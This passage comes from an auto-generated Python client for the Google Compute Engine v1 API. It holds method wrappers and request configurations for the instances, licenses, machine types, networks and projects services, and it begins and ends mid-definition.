request_field=u'accessConfig',
request_type_name=u'ComputeInstancesAddAccessConfigRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves aggregated list of instances.
Args:
request: (ComputeInstancesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/instances',
request_field='',
request_type_name=u'ComputeInstancesAggregatedListRequest',
response_type_name=u'InstanceAggregatedList',
supports_download=False,
)
def AttachDisk(self, request, global_params=None):
"""Attaches an existing Disk resource to an instance. You must first create the disk before you can attach it. It is not possible to create and attach a disk at the same time. For more information, read Adding a persistent disk to your instance.
Args:
request: (ComputeInstancesAttachDiskRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AttachDisk')
return self._RunMethod(
config, request, global_params=global_params)
AttachDisk.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.attachDisk',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/attachDisk',
request_field=u'attachedDisk',
request_type_name=u'ComputeInstancesAttachDiskRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified Instance resource. For more information, see Stopping or Deleting an Instance.
Args:
request: (ComputeInstancesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instances.delete',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
request_field='',
request_type_name=u'ComputeInstancesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteAccessConfig(self, request, global_params=None):
"""Deletes an access config from an instance's network interface.
Args:
request: (ComputeInstancesDeleteAccessConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteAccessConfig')
return self._RunMethod(
config, request, global_params=global_params)
DeleteAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.deleteAccessConfig',
ordered_params=[u'project', u'zone', u'instance', u'accessConfig', u'networkInterface'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'accessConfig', u'networkInterface'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/deleteAccessConfig',
request_field='',
request_type_name=u'ComputeInstancesDeleteAccessConfigRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DetachDisk(self, request, global_params=None):
"""Detaches a disk from an instance.
Args:
request: (ComputeInstancesDetachDiskRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DetachDisk')
return self._RunMethod(
config, request, global_params=global_params)
DetachDisk.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.detachDisk',
ordered_params=[u'project', u'zone', u'instance', u'deviceName'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'deviceName'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/detachDisk',
request_field='',
request_type_name=u'ComputeInstancesDetachDiskRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Instance resource. Get a list of available instances by making a list() request.
Args:
request: (ComputeInstancesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Instance) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.get',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}',
request_field='',
request_type_name=u'ComputeInstancesGetRequest',
response_type_name=u'Instance',
supports_download=False,
)
def GetSerialPortOutput(self, request, global_params=None):
"""Returns the specified instance's serial port output.
Args:
request: (ComputeInstancesGetSerialPortOutputRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(SerialPortOutput) The response message.
"""
config = self.GetMethodConfig('GetSerialPortOutput')
return self._RunMethod(
config, request, global_params=global_params)
GetSerialPortOutput.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.getSerialPortOutput',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'port', u'start'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/serialPort',
request_field='',
request_type_name=u'ComputeInstancesGetSerialPortOutputRequest',
response_type_name=u'SerialPortOutput',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an instance resource in the specified project using the data included in the request.
Args:
request: (ComputeInstancesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances',
request_field=u'instance',
request_type_name=u'ComputeInstancesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of instances contained within the specified zone.
Args:
request: (ComputeInstancesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instances.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instances',
request_field='',
request_type_name=u'ComputeInstancesListRequest',
response_type_name=u'InstanceList',
supports_download=False,
)
def Reset(self, request, global_params=None):
"""Performs a reset on the instance. For more information, see Resetting an instance.
Args:
request: (ComputeInstancesResetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Reset')
return self._RunMethod(
config, request, global_params=global_params)
Reset.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.reset',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/reset',
request_field='',
request_type_name=u'ComputeInstancesResetRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetDiskAutoDelete(self, request, global_params=None):
"""Sets the auto-delete flag for a disk attached to an instance.
Args:
request: (ComputeInstancesSetDiskAutoDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetDiskAutoDelete')
return self._RunMethod(
config, request, global_params=global_params)
SetDiskAutoDelete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setDiskAutoDelete',
ordered_params=[u'project', u'zone', u'instance', u'autoDelete', u'deviceName'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'autoDelete', u'deviceName'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setDiskAutoDelete',
request_field='',
request_type_name=u'ComputeInstancesSetDiskAutoDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets labels on an instance. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeInstancesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setLabels',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setLabels',
request_field=u'instancesSetLabelsRequest',
request_type_name=u'ComputeInstancesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMachineResources(self, request, global_params=None):
"""Changes the number and/or type of accelerator for a stopped instance to the values specified in the request.
Args:
request: (ComputeInstancesSetMachineResourcesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMachineResources')
return self._RunMethod(
config, request, global_params=global_params)
SetMachineResources.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMachineResources',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineResources',
request_field=u'instancesSetMachineResourcesRequest',
request_type_name=u'ComputeInstancesSetMachineResourcesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMachineType(self, request, global_params=None):
"""Changes the machine type for a stopped instance to the machine type specified in the request.
Args:
request: (ComputeInstancesSetMachineTypeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMachineType')
return self._RunMethod(
config, request, global_params=global_params)
SetMachineType.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMachineType',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMachineType',
request_field=u'instancesSetMachineTypeRequest',
request_type_name=u'ComputeInstancesSetMachineTypeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetMetadata(self, request, global_params=None):
"""Sets metadata for the specified instance to the data included in the request.
Args:
request: (ComputeInstancesSetMetadataRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetMetadata')
return self._RunMethod(
config, request, global_params=global_params)
SetMetadata.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setMetadata',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setMetadata',
request_field=u'metadata',
request_type_name=u'ComputeInstancesSetMetadataRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetScheduling(self, request, global_params=None):
"""Sets an instance's scheduling options.
Args:
request: (ComputeInstancesSetSchedulingRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetScheduling')
return self._RunMethod(
config, request, global_params=global_params)
SetScheduling.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setScheduling',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setScheduling',
request_field=u'scheduling',
request_type_name=u'ComputeInstancesSetSchedulingRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetServiceAccount(self, request, global_params=None):
"""Sets the service account on the instance. For more information, read Changing the service account and access scopes for an instance.
Args:
request: (ComputeInstancesSetServiceAccountRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetServiceAccount')
return self._RunMethod(
config, request, global_params=global_params)
SetServiceAccount.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setServiceAccount',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setServiceAccount',
request_field=u'instancesSetServiceAccountRequest',
request_type_name=u'ComputeInstancesSetServiceAccountRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTags(self, request, global_params=None):
"""Sets tags for the specified instance to the data included in the request.
Args:
request: (ComputeInstancesSetTagsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTags')
return self._RunMethod(
config, request, global_params=global_params)
SetTags.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.setTags',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/setTags',
request_field=u'tags',
request_type_name=u'ComputeInstancesSetTagsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Start(self, request, global_params=None):
"""Starts an instance that was stopped using the using the instances().stop method. For more information, see Restart an instance.
Args:
request: (ComputeInstancesStartRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Start')
return self._RunMethod(
config, request, global_params=global_params)
Start.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.start',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/start',
request_field='',
request_type_name=u'ComputeInstancesStartRequest',
response_type_name=u'Operation',
supports_download=False,
)
def StartWithEncryptionKey(self, request, global_params=None):
"""Starts an instance that was stopped using the using the instances().stop method. For more information, see Restart an instance.
Args:
request: (ComputeInstancesStartWithEncryptionKeyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('StartWithEncryptionKey')
return self._RunMethod(
config, request, global_params=global_params)
StartWithEncryptionKey.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.startWithEncryptionKey',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/startWithEncryptionKey',
request_field=u'instancesStartWithEncryptionKeyRequest',
request_type_name=u'ComputeInstancesStartWithEncryptionKeyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Stop(self, request, global_params=None):
"""Stops a running instance, shutting it down cleanly, and allows you to restart the instance at a later time. Stopped instances do not incur per-minute, virtual machine usage charges while they are stopped, but any resources that the virtual machine is using, such as persistent disks and static IP addresses, will continue to be charged until they are deleted. For more information, see Stopping an instance.
Args:
request: (ComputeInstancesStopRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Stop')
return self._RunMethod(
config, request, global_params=global_params)
Stop.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.stop',
ordered_params=[u'project', u'zone', u'instance'],
path_params=[u'instance', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/stop',
request_field='',
request_type_name=u'ComputeInstancesStopRequest',
response_type_name=u'Operation',
supports_download=False,
)
class LicensesService(base_api.BaseApiService):
"""Service class for the licenses resource."""
_NAME = u'licenses'
def __init__(self, client):
super(ComputeV1.LicensesService, self).__init__(client)
self._upload_configs = {
}
def Get(self, request, global_params=None):
"""Returns the specified License resource.
Args:
request: (ComputeLicensesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(License) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.licenses.get',
ordered_params=[u'project', u'license'],
path_params=[u'license', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/licenses/{license}',
request_field='',
request_type_name=u'ComputeLicensesGetRequest',
response_type_name=u'License',
supports_download=False,
)
class MachineTypesService(base_api.BaseApiService):
"""Service class for the machineTypes resource."""
_NAME = u'machineTypes'
def __init__(self, client):
super(ComputeV1.MachineTypesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of machine types.
Args:
request: (ComputeMachineTypesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(MachineTypeAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.machineTypes.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/machineTypes',
request_field='',
request_type_name=u'ComputeMachineTypesAggregatedListRequest',
response_type_name=u'MachineTypeAggregatedList',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified machine type. Get a list of available machine types by making a list() request.
Args:
request: (ComputeMachineTypesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(MachineType) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.machineTypes.get',
ordered_params=[u'project', u'zone', u'machineType'],
path_params=[u'machineType', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/machineTypes/{machineType}',
request_field='',
request_type_name=u'ComputeMachineTypesGetRequest',
response_type_name=u'MachineType',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of machine types available to the specified project.
Args:
request: (ComputeMachineTypesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(MachineTypeList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.machineTypes.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/machineTypes',
request_field='',
request_type_name=u'ComputeMachineTypesListRequest',
response_type_name=u'MachineTypeList',
supports_download=False,
)
class NetworksService(base_api.BaseApiService):
"""Service class for the networks resource."""
_NAME = u'networks'
def __init__(self, client):
super(ComputeV1.NetworksService, self).__init__(client)
self._upload_configs = {
}
def AddPeering(self, request, global_params=None):
"""Adds a peering to the specified network.
Args:
request: (ComputeNetworksAddPeeringRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddPeering')
return self._RunMethod(
config, request, global_params=global_params)
AddPeering.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.addPeering',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{network}/addPeering',
request_field=u'networksAddPeeringRequest',
request_type_name=u'ComputeNetworksAddPeeringRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified network.
Args:
request: (ComputeNetworksDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.networks.delete',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{network}',
request_field='',
request_type_name=u'ComputeNetworksDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified network. Get a list of available networks by making a list() request.
Args:
request: (ComputeNetworksGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Network) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.networks.get',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{network}',
request_field='',
request_type_name=u'ComputeNetworksGetRequest',
response_type_name=u'Network',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a network in the specified project using the data included in the request.
Args:
request: (ComputeNetworksInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks',
request_field=u'network',
request_type_name=u'ComputeNetworksInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of networks available to the specified project.
Args:
request: (ComputeNetworksListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(NetworkList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.networks.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/networks',
request_field='',
request_type_name=u'ComputeNetworksListRequest',
response_type_name=u'NetworkList',
supports_download=False,
)
def RemovePeering(self, request, global_params=None):
"""Removes a peering from the specified network.
Args:
request: (ComputeNetworksRemovePeeringRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemovePeering')
return self._RunMethod(
config, request, global_params=global_params)
RemovePeering.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.removePeering',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{network}/removePeering',
request_field=u'networksRemovePeeringRequest',
request_type_name=u'ComputeNetworksRemovePeeringRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SwitchToCustomMode(self, request, global_params=None):
"""Switches the network mode from auto subnet mode to custom subnet mode.
Args:
request: (ComputeNetworksSwitchToCustomModeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SwitchToCustomMode')
return self._RunMethod(
config, request, global_params=global_params)
SwitchToCustomMode.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.networks.switchToCustomMode',
ordered_params=[u'project', u'network'],
path_params=[u'network', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/networks/{network}/switchToCustomMode',
request_field='',
request_type_name=u'ComputeNetworksSwitchToCustomModeRequest',
response_type_name=u'Operation',
supports_download=False,
)
class ProjectsService(base_api.BaseApiService):
"""Service class for the projects resource."""
_NAME = u'projects'
def __init__(self, client):
super(ComputeV1.ProjectsService, self).__init__(client)
self._upload_configs = {
}
def DisableXpnHost(self, request, global_params=None):
"""Disable this project as a shared VPC host project.
Args:
request: (ComputeProjectsDisableXpnHostRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DisableXpnHost')
return self._RunMethod(
config, request, global_params=global_params)
DisableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.disableXpnHost',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/disableXpnHost',
request_field='',
request_type_name=u'ComputeProjectsDisableXpnHostRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DisableXpnResource(self, request, global_params=None):
"""Disable a serivce resource (a.k.a service project) associated with this host project.
Args:
request: (ComputeProjectsDisableXpnResourceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DisableXpnResource')
return self._RunMethod(
config, request, global_params=global_params)
DisableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.disableXpnResource',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/disableXpnResource',
request_field=u'projectsDisableXpnResourceRequest',
request_type_name=u'ComputeProjectsDisableXpnResourceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def EnableXpnHost(self, request, global_params=None):
"""Enable this project as a shared VPC host project.
Args:
request: (ComputeProjectsEnableXpnHostRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('EnableXpnHost')
return self._RunMethod(
config, request, global_params=global_params)
EnableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.enableXpnHost',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/enableXpnHost',
request_field='',
request_type_name=u'ComputeProjectsEnableXpnHostRequest',
response_type_name=u'Operation',
supports_download=False,
)
def EnableXpnResource(self, request, global_params=None):
"""Enable service resource (a.k.a service project) for a host project, so that subnets in the host project can be used by instances in the service project.
Args:
request: (ComputeProjectsEnableXpnResourceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('EnableXpnResource')
return self._RunMethod(
config, request, global_params=global_params)
EnableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.enableXpnResource',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/enableXpnResource',
request_field=u'projectsEnableXpnResourceRequest',
request_type_name=u'ComputeProjectsEnableXpnResourceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified Project resource.
Args:
request: (ComputeProjectsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Project) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.projects.get',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}',
request_field='',
request_type_name=u'ComputeProjectsGetRequest',
response_type_name=u'Project',
supports_download=False,
)
def GetXpnHost(self, request, global_params=None):
"""Get the shared VPC host project that this project links to. May be empty if no link exists.
Args:
request: (ComputeProjectsGetXpnHostRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Project) The response message.
"""
config = self.GetMethodConfig('GetXpnHost')
return self._RunMethod(
config, request, global_params=global_params)
GetXpnHost.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.projects.getXpnHost',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/getXpnHost',
request_field='',
request_type_name=u'ComputeProjectsGetXpnHostRequest',
response_type_name=u'Project',
supports_download=False,
)
def GetXpnResources(self, request, global_params=None):
"""Get service resources (a.k.a service project) associated with this host project.
Args:
request: (ComputeProjectsGetXpnResourcesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ProjectsGetXpnResources) The response message.
"""
config = self.GetMethodConfig('GetXpnResources')
return self._RunMethod(
config, request, global_params=global_params)
GetXpnResources.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.projects.getXpnResources',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/getXpnResources',
request_field='',
request_type_name=u'ComputeProjectsGetXpnResourcesRequest',
response_type_name=u'ProjectsGetXpnResources',
supports_download=False,
)
def ListXpnHosts(self, request, global_params=None):
"""List all shared VPC host projects visible to the user in an organization.
Args:
request: (ComputeProjectsListXpnHostsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(XpnHostList) The response message.
"""
config = self.GetMethodConfig('ListXpnHosts')
return self._RunMethod(
config, request, global_params=global_params)
ListXpnHosts.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.projects.listXpnHosts',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/listXpnHosts',
request_field=u'projectsListXpnHostsRequest',
request_type_name=u'ComputeProjectsListXpnHostsRequest',
response_type_name=u'XpnHostList',
supports_download=False,
)
def MoveDisk(self, request, global_params=None):
"""Moves a persistent disk from one zone to another.
Args:
request: (ComputeProjectsMoveDiskRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('MoveDisk')
return self._RunMethod(
config, request, global_params=global_params)
MoveDisk.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
